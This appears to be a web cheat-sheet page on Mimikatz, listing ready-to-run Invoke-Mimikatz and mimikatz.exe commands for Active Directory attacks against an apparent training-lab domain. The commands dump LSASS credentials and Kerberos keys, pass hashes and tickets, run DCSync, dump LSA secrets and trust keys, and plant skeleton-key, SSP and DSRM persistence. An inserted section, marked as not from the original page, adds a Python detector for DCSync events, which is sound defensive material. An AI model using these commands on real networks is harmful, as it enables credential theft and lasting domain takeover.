Tools | February 9, 2026 | 1 min read | by 0xt0pus

Mimikatz

Windows credential extraction tool for dumping passwords, hashes, and Kerberos tickets


Description

Mimikatz is used for credential dumping, pass-the-hash, pass-the-ticket, golden ticket, silver ticket, and many other Active Directory attacks. Invoke-Mimikatz is the PowerShell port that loads Mimikatz reflectively into memory. Always run it with NT AUTHORITY\SYSTEM privileges.

Usage 1: Dump Credentials (sekurlsa::ekeys)

Dump Kerberos encryption keys (ekeys) from LSASS memory.

Command:

Invoke-Mimikatz -Command '"sekurlsa::ekeys"'

Usage 2: Pass the Hash

Over-pass-the-hash attack that uses the target user's AES256 key to spawn a new PowerShell session as that user.

Command:

Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /aes256:<AES256-KEY> /run:powershell.exe"'

Usage 3: DCSync Attack

Request directory replication from a domain controller, as another DC would, to extract account credentials.

Command:

Invoke-Mimikatz -Command '"lsadump::dcsync /user:us\krbtgt"'

Command (Extract admin hash from another domain):

Invoke-Mimikatz -Command '"lsadump::dcsync /user:tech\administrator"'
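
Detection side of the DCSync usage above, as an added example that is not part of the original page: a DCSync request lands on the domain controller as Security Event ID 4662 with Access Mask 0x100 and the replication extended-right GUIDs in its Properties field, so a non-DC account requesting those rights is the signal. The event records, the DC account name DCORP-DC$ (derived from the page's dcorp-dc) and the sync service account name are constructed assumptions.

```python
# Added example (not from the original page): flag DCSync-style replication
# requests in constructed Windows Security Event ID 4662 records. A DCSync
# (lsadump::dcsync) request reaches the DC as 4662 with Access Mask 0x100
# (Control Access) and replication extended-right GUIDs in "Properties".

# Extended rights a DCSync client needs; these GUIDs are fixed by the AD schema.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Principals that legitimately replicate: DC computer accounts (DCORP-DC$ mirrors
# the page's dcorp-dc) and an assumed, hypothetical directory-sync service account.
DC_ACCOUNTS = {"DCORP-DC$"}
ALLOWED_SYNC_ACCOUNTS = {"svc_dirsync"}

def requested_replication_rights(event):
    """Names of replication rights requested by a non-DC, non-approved account."""
    if event.get("EventID") != 4662:
        return []
    if (int(event.get("AccessMask", "0x0"), 16) & 0x100) == 0:  # no Control Access
        return []
    props = event.get("Properties", "").lower()
    rights = [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]
    subject = event.get("SubjectUserName", "")
    if subject.upper() in DC_ACCOUNTS or subject.lower() in ALLOWED_SYNC_ACCOUNTS:
        return []  # expected replication traffic
    return rights

def scan_for_dcsync(events):
    """Return (account, rights) for every event that looks like a DCSync."""
    alerts = []
    for event in events:
        rights = requested_replication_rights(event)
        if rights:
            alerts.append((event["SubjectUserName"], rights))
    return alerts

# Constructed sample events (not real logs): a DC replicating normally, a user
# account requesting replication rights, and an ordinary object read.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DCORP-DC$", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "student1", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "student1", "AccessMask": "0x10",
     "Properties": "{00000000-0000-0000-0000-000000000000}"},  # placeholder attribute GUID
]

if __name__ == "__main__":
    print(scan_for_dcsync(SAMPLE_EVENTS))
```

Only the second record produces an alert; the DC's own replication and the plain object read are ignored.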

Usage 4: Pass the Ticket

Inject a Kerberos ticket (.kirbi file) into the current logon session.

Command:

Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_cifs~dcorp-mssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL.kirbi"'

Usage 5: Export Kerberos Tickets

Command:

Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

Command (Alternative):

Invoke-Mimikatz -Command '"kerberos::list /export"'

Usage 6: Dump LSA Secrets

Command:

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dc

Usage 7: Dump Trust Keys

Command:

Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc

Usage 8: Skeleton Key Attack

Patch LSASS to accept a master password for all accounts.

Command:

Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dcorp-dc.dollarcorp.moneycorp.local

Usage 9: Custom SSP (Persistence)

Log local logons and service account and machine account passwords in clear text.

Command:

Invoke-Mimikatz -Command '"misc::memssp"'

Usage 10: DSRM Persistence

Dump the DSRM (Directory Services Restore Mode) administrator's password hash from the domain controller's local SAM.

Command:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName dcorp-dc

Usage 11: Running mimikatz.exe Directly

Command:

.\mimikatz.exe
mimikatz # sekurlsa::ekeys

Usage 12: Loading Mimikatz in Meterpreter

Command:

load mimikatz
mimikatz_command -f *::